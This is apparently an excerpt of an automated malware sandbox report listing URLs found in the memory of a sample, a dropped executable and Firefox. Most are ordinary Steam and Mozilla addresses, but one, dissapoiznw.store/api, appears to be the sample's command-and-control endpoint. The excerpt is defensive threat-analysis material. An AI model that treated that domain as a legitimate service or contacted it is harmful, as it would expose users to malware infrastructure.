Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921571137.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
Source: file.exe, 00000000.00000003.2167545129.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2250494766.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921571137.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: firefox.exe, 00000019.00000003.2975681250.000001379E91D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2977256992.000001379E98A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A10D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3193146359.000001379C9C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3197648410.000001379E1BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3196543245.000001379E02A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dissapoiznw.store:443/apiC&
Source: firefox.exe, 00000019.00000003.2975681250.000001379E91D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3220295992.00000137A0106000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A699D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3271556524.000008FE0D704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A699D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272212732.00000BD3C8A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215694753.000001379FCAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272021250.00000A97B4D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3028904621.00000137A8F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3026895812.00000137A8F35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabRemove
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3047116966.00000137A62C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3248631421.00000137A62C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moresetupPrefs/hideDescriptionsRegions
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsEnable
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3201609300.000001379E203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitsection.highlights.includeDownloadsNumber
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6954000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema9e34c6e7-cbed-40a0-ba63-35488e171013
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schemaplaces.sqlite#1:
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schemaInstance
